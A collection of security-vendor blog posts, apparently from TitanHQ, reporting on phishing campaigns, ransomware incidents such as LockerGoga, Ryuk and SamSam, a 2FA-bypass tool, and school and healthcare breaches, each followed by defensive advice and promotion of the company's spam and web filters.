The email incidents include phishing attacks, spear phishing, whaling, business email compromise, and other email impersonation attacks. Those attacks resulted in network breaches, data theft, email account compromises, malware infections, and fraudulent wire transfers.
When asked about the categories of threat actors behind the attacks, 28% named ‘online scam artists’ and 20% negligence by insiders. Online scam artists include phishers who send hyperlinks to malicious websites via email. It was a similar story the previous year when the survey was last conducted.
Given the number of email-related breaches it is clear that anti-phishing defenses in healthcare need to be improved. HIPAA requires all healthcare employees to receive security awareness training, part of which should include training on how to identify phishing attacks. While this is a requirement for compliance, a significant percentage (18%) of healthcare organizations do not take this further and are not conducting phishing simulations, even though they have been shown to improve resilience against phishing attacks by reinforcing training and identifying weaknesses in training programs.
The continued use of out of date and unsupported software was also a major concern. Software such as Windows Server and Windows XP are still extensively used in healthcare, despite the number of vulnerabilities they contain. 69% of respondents admitted still using legacy software on at least some machines. When end users visit websites containing exploit kits, vulnerabilities on those devices can easily be exploited to download malware.
It may take some time to phase out those legacy systems, but improving healthcare email security is a quick and easy win. HIMSS recommends improving training for all employees on the threat from phishing with the aim of decreasing click rates on phishing emails. That is best achieved through training, phishing simulations, and better monitoring of responses to phishing emails to identify repeat offenders.
At TitanHQ, we can offer two further solutions to improve healthcare email security. The first is an advanced spam filtering solution that blocks phishing emails and prevents them from being delivered to inboxes. The second is a solution that prevents employees from visiting phishing and other malicious websites such as online scams.
SpamTitan is an advanced anti-phishing solution that scans all incoming emails using a wide range of methods to identify malicious messages. The solution has a catch rate in excess of 99.9% with a false positive rate of just 0.03%. The solution also scans outbound messages for spam signatures to help identify compromised email accounts.
WebTitan Cloud is a cloud-based web filtering solution that blocks attempts by employees to visit malicious websites, either through web surfing or responses to phishing emails. Should an employee click on a link to a known malicious site, the action will be blocked before any harm is caused. WebTitan also scans websites for malicious content to identify and block previously known phishing websites and other online scams. Alongside robust security awareness training programs, these two solutions can help to significantly improve healthcare email security.
For further information on TitanHQ’s healthcare email security and anti-phishing solutions, contact TitanHQ today.
A new Office 365 phishing scam has been detected that attempts to get users to part with their Office 365 credentials with a request for collaboration via SharePoint. These collaboration requests spoofing SharePoint are becoming more common.
The SharePoint spoofing campaign was first detected in the summer of 2018 by researchers at cybersecurity firm Avanan. The Office 365 phishing scam is ongoing and has proven to be highly effective. According to Kaspersky Lab, the phishing campaign has been used in targeted attacks on at least 10% of companies that use Office 365.
This Office 365 phishing scam abuses trust in SharePoint services that are often used by employees. An email is sent to an Office 365 user that contains a link to a document stored in OneDrive for Business. In contrast to many phishing campaigns that spoof links and fool users into visiting a website other than the one indicated by the link text, this link actually does direct the user to an access request document on OneDrive.
A link in the document then directs users to a third-party website where they are presented with a Microsoft Office 365 login page that is a perfect copy of the official Office 365 login page. If login credentials are entered, they are given to the scammers. Once obtained, it is possible for the scammers to gain access to the Office 365 account of the user, including email and cloud storage.
The email accounts can be used for further phishing campaigns on the user’s contacts. Since those messages come from within the organization, they are more likely to be trusted. Email accounts can also contain a wealth of sensitive information which is of great value to competitors. In healthcare, email accounts can contain patient information, including data that can be used to steal identities. The attackers can also use the compromised credentials to spread malware. Employees may know not to open attachments from unknown individuals, but when they are sent from a colleague, they are more likely to be opened.
Businesses that use Microsoft’s Advanced Threat Protection (APT) service may mistakenly believe they are protected from phishing attacks such as this. However, since the links in the email are genuine OneDrive links, they are not identified as malicious. It is only the link in those documents that is malicious, but once the document is opened, Microsoft’s APT protection has already been bypassed.
Finding Office 365 users is not difficult. According to a 2017 Spiceworks survey, 83% of enterprises use Office 365 and figures from 2018 suggest 56% of organizations globally have adopted Office 365. However, a basic check can easily identify Office 365 users as it is broadcast on public DNS MX records. If one user can be found in an organization, it is highly likely that every other user will be using Office 365.
Businesses can take steps to avoid Office 365 phishing scams such as this.
Ensure that all employees are made aware of the threat from phishing, and specifically this Office 365 phishing scam. They should be told to exercise caution with offers to collaborate that have not been preceded by a conversation.
Conduct phishing email simulations to test defenses against phishing and identify individuals that require further security awareness training.
Activate multifactor authentication to prevent stolen credentials from being used to access Office 365 accounts from unknown locations/devices.
Change from APT anti-phishing controls to a third-party spam filter such as SpamTitan. This will not only improve catch rates, it will also not broadcast that the organization uses Office 365.
Use an endpoint protection solution that is capable of detecting phishing attacks.
Implement a web filter to prevent users from visiting known phishing websites and other malicious web pages.
Office 365 Phishing Scam Uses SharePoint Lure FAQ
How does a spam filter block social engineering attacks?
Spam filters use real-time block lists to block known sources of spam, greylisting to identify new spam sources, and SPF and DMARC to identify email impersonation attacks. Message content is checked for common signatures of phishing and social engineering attacks. Each message is assigned a score. If a threshold is reached, the message is quarantined or blocked.
What are the main anti-phishing solutions?
A spam filter is the most important anti-phishing solution to prevent phishing and other malicious messages from reaching inboxes. A web filter is important for preventing end users from visiting malicious websites, and end user training and phishing simulations to condition the workforce to recognize threats. Multi-factor authentication is also important to prevent compromised credentials from being used to access accounts.
Why do I need a third-party spam filter for Office 365?
The default Office 365 spam filter is effective at blocking spam email and known malware, but is far less effective at blocking phishing, spear phishing, and zero-day attacks. A more advanced spam filter is required to block these dangerous email threats. SpamTitan uses dual antivirus engines and sandboxing for malware protection, URLs are checked against blacklists of known spam and phishing sources, greylisting for detecting new spam sources, and SPF and DMARC for identifying email impersonation attacks.
Can antivirus software stop phishing attacks?
Antivirus software is concerned with preventing viruses, malware, and ransomware from being downloaded or executed on a device. Phishing attacks are usually concerned with obtaining sensitive information such as login credentials, and antivirus software will not block these attacks. A spam filter protects against phishing by analyzing message headers, content, and embedded hyperlinks to identify phishing and spear phishing emails and prevent them from being delivered.
Is spam filtering software expensive?
Spam filtering software offers exceptional value for money as it blocks email threats that could easily result in a costly data breach or malware infection. The cost of spam filtering software is typically a few dollars per user per year. To find out how much an advanced spam filter is likely to cost, use our cost calculator or contact the sales team for a no obligation quote.
The French engineering firm Altran Technologies has been grappling with a malware infection that hit the firm on January 24, 2019.
Immediately following the malware attack, Altran shut down its network and applications to prevent the spread of the infection and to protect its clients. Technical and computer forensics experts are now assisting with the investigation. The Altran cyberattack has affected operations in some European countries and the firm is currently working through its recovery plan.
A public announcement has been made about the attack although the malware involved has not been officially confirmed. Some cybersecurity experts believe the attack involved a new ransomware variant named LockerGoga which emerged in the past few days.
LockerGoga ransomware was first identified on January 24 in Romania and subsequently in the Netherlands. It was named by MalwareHunterTeam, based on the path used for compiling the source code into an executable.
LockerGoga ransomware does not appear to be a particularly sophisticated malware variant. Security researcher Valthek, who analyzed the malware, claimed the code was ‘sloppy’, the encryption process was slow, and little effort appears to have been made to evade detection. The ransomware appends encrypted files with the .locked file extension.
The ransomware note suggests that companies are being targeted although it is currently unclear how the ransomware is being distributed.
LockerGoga ransomware encrypts a wide range of file types and, depending on the command line argument, may target all files. Since the encryption process is slow, fast detection and remediation will limit the damage caused. Failure to detect the ransomware and take prompt action to mitigate the attack could prove costly. The ransomware can spread laterally through network connections and network shares, resulting in widespread file encryption.
The ransomware had a valid certificate that was issued to a UK firm by Comodo Certificate Authority. The certificate has since been revoked.
LockerGoga ransomware is currently being detected as malicious by 46/69 AV engines on VirusTotal, including Bitdefender, the primary AV engine used by SpamTitan.
The massive Allscripts EHR breach in January 2018 resulted in massive disruption for the company and its clients. Clients were locked out of their electronic health records for several days while the company battled to recover from the attack. Around 1,500 of the company’s clients were affected.
The cost of mitigating the ransomware attack was considerable, and in addition to those costs, the Allscripts EHR breach prompted many clients to take legal action. The costs continue to mount.
The Allscripts EHR breach involved SamSam ransomware, which has plagued the healthcare industry over the past couple of years. The threat actors behind the attacks typically gain access to healthcare networks through RDP vulnerabilities and deploy the ransomware manually after scouting the network. This way, maximum damage can be inflicted, which increases the probability of the ransom being paid.
The Allscripts EHR breach certain stands out as one of the most damaging ransomware attacks of 2018, although it was just one of many healthcare ransomware attacks in 2018 involving many ransomware variants.
According to Beazley Breach Response Services, ransomware attacks more than doubled in September. Many cybercriminals have switched to cryptocurrency mining malware, but the ransomware attacks on healthcare organizations are continuing and show no sign of slowing.
In recent months, there has been a growing trend of combining malware variants to maximize the profitability of attacks. Ransomware is a quick and easy way for cybercriminals to earn money but combining ransomware with other malware variants is much more profitable. Further, if files are recovered from backups and no ransom is paid, cybercriminals can still profit from the attacks.
Several campaigns have been detected recently that combine Trojans such as AZORult, Emotet and Trickbot with ransomware. Attacks with these Trojans have increased by 132% since 2017 according to Malwarebytes. The Trojans steal sensitive information through keylogging, are capable lateral movement within a network, and also serve as downloaders for other malware such as Ryuk and GandCrab ransomware. Once information has been stolen, the ransomware payload is deployed.
The Allscripts EHR breach was somewhat atypical. It is far more common for ransomware to be delivered via email than brute force attacks on RDP. The campaigns combining Emotet, Trickbot, and AZORult with ransomware are primarily delivered by email.
In addition to ransomware attacks, phishing attacks are rife in healthcare. Email was the most common location of exposed protected health information in 2018. Email security is a weak point in healthcare defenses.
The number of successful ransomware and phishing attacks in healthcare make it clear that email security needs to improve. An advanced spam filter to block malicious emails, improved end user training is required to teach employees how to recognize email threats, intrusion detection systems need to be deployed, along with powerful anti-virus solutions. Only by implementing layered defenses to block email attacks and other attack vectors will healthcare organizations be able to reduce the risk of ransomware attacks.
A new Ursnif Trojan campaign has been detected that uses a new variant of the malware which uses fileless techniques to avoid detection. In addition to the banking Trojan, GandCrab ransomware is also downloaded.
Increase in Banking Trojan and Ransomware Combination Attacks
Ransomware attacks can cause considerable disruption to businesses, although a good backup strategy can allow businesses to recover quickly in the event of a successful attack without having to pay the ransom demand.
However, there has been a significant increase in phishing attacks that deliver not one but two malware variants – ransomware to extort money from companies but also an information stealer to obtain sensitive information such as login and banking credentials. Malware variants used in these attacks also have the capability to download other malware variants and gather system data and process information for use in further attacks.
These phishing campaigns allow hackers to maximize the profitability of attacks and make the attack profitable even if the business does not pay the ransom.
There have been several examples of these attacks in recent months. Earlier in January, warnings were issued about the combination of Ryuk ransomware with the Trickbot and Emotet Trojans – Two malware variants that are used in wire fraud attacks. Ryuk ransomware has been extensively used in attacks on U.S. healthcare providers. The combination with the banking Trojans makes the attacks far more damaging.
Now another campaign has been detected using different malware variants – The Ursnif Trojan and the latest version of GandCrab ransomware.
What Does the Ursnif Trojan Do?
The Ursnif Trojan is one of the most active banking Trojans currently in use. The main functions of the malware is to steal system information and bank account credentials from browsers. The latest variants of the Ursnif Trojan have also been used to deploy other malware variants such as GandCrab ransomware.
According to security researchers at Carbon Black, who identified the latest campaign, the Ursnif Trojan now uses fileless execution mechanisms to make detection more difficult. Instead of downloading and writing files to the hard drive – which can be detected – a PowerShell script downloads a payload and executes it in the memory. That payload then downloads a further file and injects it into the PowerShell process, ultimately resulting in the downloading of the ransomware.
When code is loaded in the memory, it often does not survive a reboot, although the latest variant of Ursnif has persistence. This is achieved by storing an encoded PowerShell command inside a registry key and subsequently launching the command via the Windows Management Instrumentation Command-line (WMIC).
Once information has been collected from an infected system, it is packaged inside a CAB file and sent back to the attackers C2 via encrypted HTTPS. This makes data exfiltration difficult to detect.
The Ursnif Trojan campaign uses email as the attack vector with infection occurring via a Word document attachment that contains a VBA macro. If the attachment is opened and macros are enabled (automatically or manually), the infection process will be triggered.
How Businesses can Protect Against Attacks
Due to the difficulty detecting the malware attack once it has started, the best way to protect against this attack is by improving anti-phishing defenses. It is important to prevent the malicious emails from being delivered to inboxes and to ensure that employees are trained how to identify the messages if they make it past email defenses. The former can be achieved with a powerful spam filtering solution such as SpamTitan.
Along with security awareness training for employees to condition them not to open emails from unknown senders or open attachments and enable macros, businesses can mount an effective defense against the attack.
SMB cybersecurity protections do not need to be advanced as those of large enterprises, but improvements need to be made to ensure smaller businesses are protected. The risk of a cyberattack is not theoretical. While large businesses are having their defenses regularly tested, small to medium sized businesses are also being attacked. And alarmingly often.
Large businesses may store much higher volumes of valuable data, but they also tend to invest heavily in the latest cybersecurity technologies and have dedicated teams to oversee security. Cyberattacks are therefore much harder to pull off. SMBs are much easier targets. Cyberattacks may be less profitable, but they are easier and require less effort.
SMB Cyberattacks are Increasing
A 2017 SCORE study confirmed the extent to which hackers are attacking SMBs. Its study of macro-based malware showed there had been at least 113,000 attacks on SMBs in 2017 and 43% of those attacks were on SMBs. SMBs suffered at least 54,000 ransomware attacks in 2017 and online banking attacks were highly prevalent in the SMB sector.
The 2018 State of Cybersecurity in Small and Medium Size Businesses study, conducted by the Ponemon Institute, painted an even bleaker picture for SMBs. The study suggests SMBs face the same cybersecurity risks as larger businesses and are being attacked almost as often. In its study, 67% of SMB respondents reported having experienced a cyberattack in the past 12 months and 58 had suffered a data breach. Alarmingly, almost half of respondents (47%) said they had little or no understanding about how SMB cyberattacks could be prevented.
The study revealed 60% of successful cyberattacks were the result of employee negligence, hackers were behind 37% of breaches, and for 32% of cyberattacks the cause could not be established.
The high number of successful cyberattacks makes it clear that SMB cybersecurity needs to be improved. Unfortunately, many SMBs simply don’t have the budget to pay for expensive cybersecurity solutions and a lack of skilled staff is also an issue. So, given these restraints, where should SMBs start?
Where to Start with SMB Cybersecurity
Improving SMB cybersecurity does not necessarily mean hiring skilled cybersecurity staff and spending heavily on state-of-the-art cybersecurity solutions. The best place to start is by ensuring basic cybersecurity best practices are adopted. Highly sophisticated cyberattacks are becoming more common, but many successful attacks are the result of basic cybersecurity failures.
These include the failure to implement password policies that enforce the use of strong passwords, not changing all default passwords, or not using a unique password for each account. Implementing 2-factor authentication is a quick way to improve security, as is the setting of rate limiting to lock accounts after a set number of failed login attempts.
Many successful cyberattacks start with a phishing email. An advanced spam filtering solution is therefore essential. This will ensure virtually all malicious messages are blocked and are not delivered to end users. A web filter also offers protection against phishing by preventing employees from visiting phishing websites. It will also block web-based attacks and malware downloads. Both of these SMB cybersecurity solutions can be implemented at a low cost. It costs just a few dollars per year, per employee, to implement SpamTitan and WebTitan.
A little training goes a long way. Employees should be provided with cybersecurity training and should be taught how to identify email and web-based threats. There are plenty of free and low-cost resources for SMBs to help them train their employees. US-CERT is a good place to start.
Good backup policies are an essential part of SMB cybersecurity. In the event of a cyberattack or ransomware attack, this will prevent catastrophic data loss. A good strategy to adopt is the 3-2-1 approach. Three copies of backups, on two different types of media, with one copy stored securely off-site. Also make sure backups are tested to ensure file recovery is possible.
Once the basics have been covered, it is important to conduct a security audit to discover just how secure your network and systems are. Many managed service providers can assist with security audits and assessments if you do not have sufficiently skilled staff to perform an audit inhouse.
Improvements to SMB cybersecurity will carry a cost but bear in mind that an ounce of security is worth a pound of protection and investment in cybersecurity will prove to be much less expensive than having to deal with a successful cyberattack.
2-factor authentication is an important safeguard to prevent unauthorized account access, but does 2-factor authentication stop phishing attacks?
What is 2-Factor Authentication?
2-Factor authentication is commonly used as an additional protection measure to prevent accounts from being accessed by unauthorized individuals in the event that a password is compromised.
If a password is disclosed in a phishing attack or has otherwise been obtained or guessed, a second authentication method is required before the account can be accessed.
Two-factor authentication uses a combination of two different methods of authentication, commonly something a person owns (device/bank card), something a person knows knows (a password or PIN), and/or something a person has (fingerprint, iris scan, voice pattern, or a token).
The second factor control is triggered if an individual, authorized or otherwise, attempts to login from an unfamiliar location or from a device that has not previously been used to access the account.
For instance, a person uses their laptop to connect from a known network and enters their password. No second factor is required. The same person uses the same device and password from an unfamiliar location and a second factor must be supplied. If the login credentials are used from an unfamiliar device, by a hacker for instance that has obtained a username and password in a phishing attack, the second factor is also required.
A token or code is often used to verify identity, which is sent to a mobile phone. In such cases, in addition to a password, an attacker would also need to have the user’s phone.
Does 2-Factor Authentication Stop Phishing Attacks?
So, does 2-factor authentication stop phishing attacks from succeeding? In many cases, it does, but 2-factor authentication is not infallible. While it was once thought to be highly effective at stopping unauthorized account access, opinion is now changing. It is certainly an important additional, low-cost layer of security that is worthwhile implementing, but 2-factor authentication alone will not prevent all phishing attacks from succeeding.
There are various methods that can be used to bypass 2-factor authentication, for instance, if a user is directed to a phishing page and enters their credentials, the hacker can then use those details in real-time to login to the legitimate site. A 2FA code is sent to the user’s device, the user then enters that code into the phishing page. The attacker then uses the code on the legitimate site.
This 2-factor authentication bypass is somewhat cumbersome, but this week a phishing tool has been released that automates this process. The penetration testing tool was created by a Polish researcher named Piotr Duszynski, and it allows 2FA to be bypassed with ease.
The tool, named Modlishka, is a reverse proxy that has been modified for handling login page traffic. The tool sits between the user and the target website on a phishing domain. When the user connects to the phishing page hosting this tool, the tool serves content from the legitimate site – Gmail for instance – but all traffic passes through the tool and is recorded, including the 2FA code.
The user supplies their credentials, a 2-factor code is sent to their phone, and that code is entered, giving the attacker account access.
It is an automated version of the above bypass that only requires a hacker to have a domain to use, a valid TLS certificate for the domain, and a copy of the tool. No website phishing templates need to be created as they are served from the genuine site. Since the tool has been made available on Github, the 2FA bypass could easily be used by hackers.
Additional Controls to Stop Phishing Attacks
To protect against phishing, a variety of methods must be used. First, an advanced spam filter is required to prevent phishing emails from reaching inboxes. SpamTitan, for instance, blocks more than 99.9% of spam and phishing emails.
Fewer than 0.1% of emails may make it past the spam filter, but any one could result in an account compromise. Security awareness training should therefore be provided to employees to help them identify suspicious emails.
Unfortunately, people do make mistakes and phishing emails can be highly realistic, so it is wise to also implement a web filter.
A web filter will block attempts to connect to known phishing sites and can assess sites in real time to help determine their authenticity. If the checks fail, the user will be prevented from accessing the site.
These anti-phishing controls are now essential cybersecurity measures for businesses to protect against phishing attacks, and are all the more important since 2FA cannot be relied upon to protect against unauthorized access once a password has been compromised.
You can find out more about SpamTitan and WebTitan by contacting TitanHQ.
The last weekend of 2018 has seen a major newspaper cyberattack in the United States that has disrupted production of several newspapers produced by Tribune Publishing.
The attacks were malware-related and affected the Saturday editions of the Los Angeles Times, the San Diego Union-Tribune, the Chicago Tribune, the New York Times, the Wall Street Journal, and others. The malware attack occurred on Thursday, December 27, and caused major problems throughout Friday.
All of the affected newspapers shared the same production platform, which was disrupted by the malware infection. While the type of malware used in the attack has not been publicly confirmed, several insiders at the Tribune have reported that the attack involved Ryuk ransomware.
Ransomware is a form of malware that encrypts critical files preventing them from being accessed. The primary goal of attackers is usually to obtain ransom payments in exchange for the keys to decrypt the encrypted files. It is also common for ransomware to be deployed after network access has been gained and sensitive information has been stolen, either to mask a data breach or in an attempt to make an attack even more profitable. It is also not unknown for ransomware attacks to be conducted to cause disruption. It is suspected that this newspaper cyberattack was conducted primarily to disable infrastructure.
The type of ransomware used in an attack is usually easy to identify. After encrypting files, ransomware changes file extensions to an (often) unique extension. In the case of Ryuk ransomware, extensions are changed to .ryk.
The Los Angeles Times has attributed it to threat actors based outside the United States, although it is unclear which group was behind the cyberattacks. If the attack was conducted to disable infrastructure it is probable that this was a nation-state sponsored attack.
The first Ryuk ransomware cyberattacks occurred in August. Three U.S. companies were attacked, and the attackers were paid at least $640,000 for the keys to unlock the data. An analysis of the ransomware revealed it shared code with Hermes malware, which had previously been linked to the Lazarus Group – An APT group with links to North Korea.
While many ransomware campaigns used mass spamming tactics to distribute the ransomware and infect as many end users as possible, the Ryuk ransomware attacks were much more targeted and involved considerable reconnaissance and extensive network mapping before the ransomware is finally deployed. As is the case with SamSam ransomware attacks, the campaign is conducted manually.
Several methods are used to gain access to networks, although earlier this year a warning about Ryuk ransomware was issued by the U.S. Department of Health and Human Services claiming email to be one of the main attack vectors, highlighting the importance of email security and end user training to help employees recognize email-based threats.
There are many costs associated with cyberattacks and data breaches, but one of the hardest to quantify is damage to a brand. Brand damage following a data breach is one of the most serious issues, and one that money cannot easily resolve.
Businesses can invest in cybersecurity solutions to prevent further security breaches, but when customers lose trust in a brand, they will simply take their business elsewhere. Winning customers back can be a long process. In many cases, once trust in a brand is lost, customers will leave and never return.
Consumers Expect Businesses to Protect Their Personal Data
If a company asks consumers to provide them with personal data, it is essential that steps are taken to ensure that information remains private and confidential. Consumers believe that any company that collects personal data has an obligation to protect it. A Ponemon Institute study in 2017 confirmed that to be the case. 71% of consumers believed companies that collect personal data have a responsibility to protect it. When a cyberattack occurs that results in the exposure or theft of personal data, consumers are naturally angry at a company for failing to take sufficient precautions to keep their data private.
The same survey revealed that following a data breach, two thirds of consumers lost trust in the breached company and almost a third of consumers said they had terminated their relationship with a brand following a data breach. Companies that were surveyed reported customer churn rates increased up to 7% following a breach. Another study suggests customer loss is more severe and up to 20% of customers have switched brands after their personal information was stolen from a company they did business with. A 2017 study by Gemalto suggests those figures are very conservative. The Gemalto study suggested 70% of customers would switch brands following a data breach.
Loss of Trust in a Brand can have Catastrophic Consequences
Large businesses may be able to weather the storm and regain customer trust over time, but smaller businesses can really struggle. On top of the considerable costs of mitigating a data breach, a loss of anywhere between 20% and 70% of customers would likely be the final nail in the coffin. Loss of customer trust is part of the reason why 60% of SMBs fold within 6 months of a data breach (National Cyber Security Alliance).
Blocking cyberattacks and preventing data breaches requires investment in cybersecurity solutions. Naturally, an advanced firewall is required, and solutions should be introduced to block the most common attack vectors – email for instance – but one area of cybersecurity that is often overlooked is WiFi filtering. WiFi filtering and protecting your brand go hand in hand.
WiFi Filtering and Protecting your Brand
The importance of WiFi Filtering for protecting your brand should not be underestimated. Implementing a web filtering solution shows your customers that you care about security and want to ensure they are protected when they access the Internet through your WiFi network. By implementing a WiFi filter you can prevent customers from downloading malware and ransomware and stop them from connecting to phishing websites.
A WiFi filter can also prevent users from accessing illegal content on your WiFi network. There have been cases of businesses having Internet access terminated by their ISPs over illegal online activity by users – the accessing of banned web content or copyright infringing downloads for instance.
One of the most important uses of a WiFi filter is to prevent users from accessing unacceptable content such as pornography. There is growing pressure on businesses to prevent adult content from being accessed on WiFi networks that are used by customers. McDonalds decided to implement a WiFi filter in 2016 following campaigns by consumers to make its access points family-friendly and in 2018 Starbucks was pressured into doing the same. The coffee shop chain will finally start filtering the internet on its WiFi networks in 2019.
A WiFi filter will also prevent employees from visiting malicious websites and downloading malware that gives criminals access to your internal networks and customer data, thus preventing costly, reputation damaging data breaches.
Businesses that fail to block web-based attacks are taking a major risk, and an unnecessary one considering the low cost of WiFi filtering.
Benefits of WebTitan Cloud for WiFi
Benefits of WebTitan Cloud for WiFi for include:
Create a family-friendly, safe and secure web browsing environment
Manage access points through a single web-based administration panel
Protect any number of Wi-Fi access points
Filter by website, website category, keyword term, or keyword score
Reduce the risk of phishing attacks
Block malware and ransomware downloads
Inspect encrypted websites with SSL certificates
Schedule and run reports on demand
Gain a real-time view of internet activity
Gain insights into bandwidth use and restrict activities to conserve bandwidth
Integrate the solution into existing billing, auto provisioning and monitoring system through a suite of APIs
Apply time-based filtering controls
Multiple hosting options, including within your own data center
Can be supplied as a white label for MSPs and resellers
World class customer service
Highly competitive pricing and a fully transparent pricing policy
For further information on WiFi Filtering and protecting your brand, contact the TitanHQ team today. Our cybersecurity experts will explain how WebTitan can protect your business and will be happy to schedule a product demonstration and help you set up a free trial of WebTitan to evaluate the solution in your own environment.
A major San Diego School District phishing attack has been discovered. The phishing attack stands out from the many similar phishing attacks on schools due to the extent of accounts that were compromised, the amount of data that was potentially obtained, and the length of time it took for the data breach to be detected.
According to a recent breach announcement, the login credentials of around 50 district employees were obtained by the attacker. It is not unusual for multiple accounts to be breached in school phishing attacks. Once access is gained to one account, it can be used to send internal phishing emails to other staff members. Since those emails come from within, they are more likely to be trusted and less likely to be detected. Investigations into similar phishing attacks often reveal many more email accounts have been compromised than was initially thought, although 50 sets of compromised credentials is particularly high.
Those accounts were compromised over a period of 11 months. The San Diego School District phishing attack was first detected in October 2018 after staff alerted the district’s IT department to phishing emails that had been received. Multiple reports tipped off the IT department that an ongoing cyberattack was occurring and there may have been a data breach.
The investigation revealed the credentials obtained by the attacker provided access to the district’s network services, which included access to the district’s database of staff and student records. The school district is the second largest in California and serves over 121,000 students each year. The database contained records going back to the 2008/2009 school year. In total, the records of more than 500,000 individuals were potentially obtained by the hacker. Given the length of time that the hacker had access to the network, data theft is highly probable.
The data potentially obtained was considerable. Student information compromised included names, addresses, dates of birth, telephone numbers, email addresses, enrollment and attendance information, discipline incident information, health data, legal notices on file, state student ID numbers, emergency contact information, and Social Security numbers. Compromised staff information also included salary information, health benefits data, paychecks and pay advices, tax data, and details of bank accounts used for direct deposits.
Data could be accessed from January 2018 to November 2018. While it is typical for unauthorized access to be immediately blocked upon discovery of a breach, in this case the investigation into the breach was conducted prior to shutting down access. This allowed the identity of the suspected hacker to be determined without tipping off the hacker that the breach had been detected. The investigation into the breach is ongoing, although access has now been blocked and affected individuals have been notified. Additional cybersecurity controls have now been implemented to block future attacks.
School district phishing attacks are commonplace. School districts often lack the resources of large businesses to devote to cybersecurity. Consequently, cyberattacks on school districts are much easier to pull off. Schools also store large volumes of sensitive data of staff and students, which can be used for a wide range of malicious purposes. The relative ease of attacks and a potential big payday for hackers and phishers make schools an attractive target.
The San Diego School District phishing attack is just one of many such attacks that have been reported this year. During tax season at the start of 2018, many school districts were targeted by phishers seeking the W-2 forms of employees. It is a similar story every year, although the threat actors behind these W-2 phishing attacks have been more active in the past two years.
In December this year, Cape Cod Community College suffered a different type of phishing attack. The aim of that attack was to convince staff to make fraudulent wire transfers. At least $800,000 was transferred to the attackers’ accounts in that attack.
These attacks clearly demonstrate the seriousness of the threat of phishing attacks on school districts and highlights the importance of implementing robust cybersecurity protections to protect against phishing.
If you want to improve your defenses against phishing, contact the TitanHQ team today for further information on anti-phishing solutions for schools.
According to a recent Irish phishing study, as many as 185,000 office workers in the country have fallen victim to phishing scams.
Phishing is a method used by cybercriminals to obtain sensitive information such as login credentials, financial information, and other sensitive data. While phishing can take place over the phone, via messaging platforms or by text message, email is most commonly used.
Messages are sent in bulk in the hope that some individuals will respond, or campaigns can be much more targeted. The latter is referred to as spear phishing. With spear phishing attacks, cybercriminals often research their victims and tailor messages to maximize the probability of them eliciting a response.
A successful phishing attack on employees can see them disclose their email credentials which allows their accounts to be accessed. Then the attackers can search emails accounts for sensitive information or use the accounts to conduct further phishing attacks on other employees. When financial information is disclosed, business bank accounts can be emptied.
Businesses can suffer major financial losses as a result of employees responding to phishing emails, the reputation of the business can be damaged, customers can be lost, and there is also a risk of major regulatory fines.
Irish Phishing Study Findings
The Irish phishing study was conducted on 500 Irish office workers by the survey consultancy firm Censuswide. Respondents to the Irish phishing study were asked questions about phishing, whether they had fallen for a phishing scam in the past, and how they rated their ability to identify phishing attacks.
In line with findings from surveys conducted in other countries, 14% of respondents said they had been a victim of a phishing attack. There were also marked differences between different age groups. Censuswide analyzed three age groups: Millennials, Gen X, and baby boomers. The latter two age groups were fairly resistant to phishing attempts. Gen X were the most phishing-savvy, with just 6% of respondents in the age group admitting to having been fooled by phishing emails in the past, closely followed by the baby boomer generation on 7%. However, 17% of millennials admitted having fallen for a phishing scam – The generation that should, in theory, be the most tech-savvy.
Interestingly, millennials were also the most confident in their ability to recognize phishing attempts. 14% of millennials said they would not be certain that they could detect fraud, compared to 17% of Gen X, and 26% of baby boomers.
It is easy to be confident about one’s ability to spot standard phishing attempts, but phishing attacks are becoming much more sophisticated and very realistic. Complacency can be very dangerous.
Phishing Protection for Businesses
The results of the Irish phishing study make it clear that businesses need to do more to protect themselves from phishing attacks. Naturally, an advanced spam filtering solution is required to ensure that employees do not have their phishing email identification skills put to the test constantly. SpamTitan, for instance, blocks more than 99.9% of spam and phishing emails, thus reducing reliance on employees’ ability to identify scam emails.
The Irish phishing study also highlights the importance of providing security awareness training to employees. The study revealed 44% of the over 54 age group had opened an attachment or clicked on a link in an email from an unknown sender, as had 34% of millennials and 26% of the Gen X age group. Alarmingly, one in five respondents said that their employer had not provided any security awareness training whatsoever.
Employees need to learn how to identify scams, so security awareness training must be provided. Since cybercriminals’ tactics are constantly evolving, training needs to be continuous. Annual or biannual training sessions should be provided, along with shorter refresher training sessions. Businesses should also consider conducting phishing email simulations to test resilience to phishing attacks and highlight weak links.
To be effective, anti-phishing training needs to be provided to all employees and requires buy-in from all departments. Unless that happens, it will be difficult to develop a culture of security awareness.
In this post we offer four simple steps to take to improve Office 365 security and make it harder for hackers and phishers to gain access to users’ accounts.
Hackers are Targeting Office 365 Accounts
It should come as no surprise to hear that hackers are targeting Office 365 accounts. Any software package that has 155 million global users is going to be a target for hackers, and with the number of users growing by an astonishing 3 million a month, Office 365 accounts are likely to be attacked even more frequently.
One study this year has confirmed that to be the case. There has been a 13% increase in attempts to hack into Office 365 email accounts this year, and many of those attacks succeed. You should therefore take steps to improve Office 365 security.
Hackers themselves are paying for Office 365 and are probing its security protections to find vulnerabilities that can be exploited. They also test their phishing emails on real office 365 accounts to find out which ones bypass Microsoft’s anti-phishing protections.
When emails have been developed that bypass Microsoft’s anti-phishing protections, mass email campaigns are launched on Office 365 users. Businesses using Office 365 can easily be found and targeted because it is made clear that they use Office 365 through public DNS MX records.
So how can you improve office 365 security and make it harder for hackers? If you take the four steps below, you will be able to greatly improve Office 365 security and thwart more attacks.
Enforce the Use of Strong Passwords
Hackers often conduct brute force attacks on Office 365 email accounts so you need to develop a strong password policy and prevent users from setting passwords that are easy to brute force. You should not allow dictionary words or any commonly used weak passwords, that otherwise meet your password policy requirements – Password1! for instance.
The minimum length for a password should be 8 characters but consider increasing that minimum. A password of between 12 and 15 characters is recommended. Make sure you do not set a too restrictive maximum number of characters to encourage the use of longer passphrases. Passphrases are harder to crack than 8-digit passwords and easier for users to remember. To make it even easier for your users, consider using a password manager.
Implement Multi-Factor Authentication
Even with strong passwords, some users’ passwords may be guessed, or users may respond to phishing emails and disclose their password to a scammer. An additional login control is therefore required to prevent compromised passwords from being used to access Office 365 accounts.
Multi-factor authentication is not infallible, but it will help you improve Office 365 security. With MFA, in addition to a password, another method of authentication is required such as a token or a code sent to a mobile phone. If a password is obtained by a hacker, and an attempt is made to login from a new location or device, further authentication will be required to access the account.
Enable Mailbox Auditing in Office 365
Mailbox auditing in Office 365 is not turned on by default so it needs to be enabled. You can set various parameters for logging activity including successful login attempts and various mailbox activities. This can help you identify whether a mailbox has been compromised. You can also logs failed login attempts to help you identify when you are being attacked.
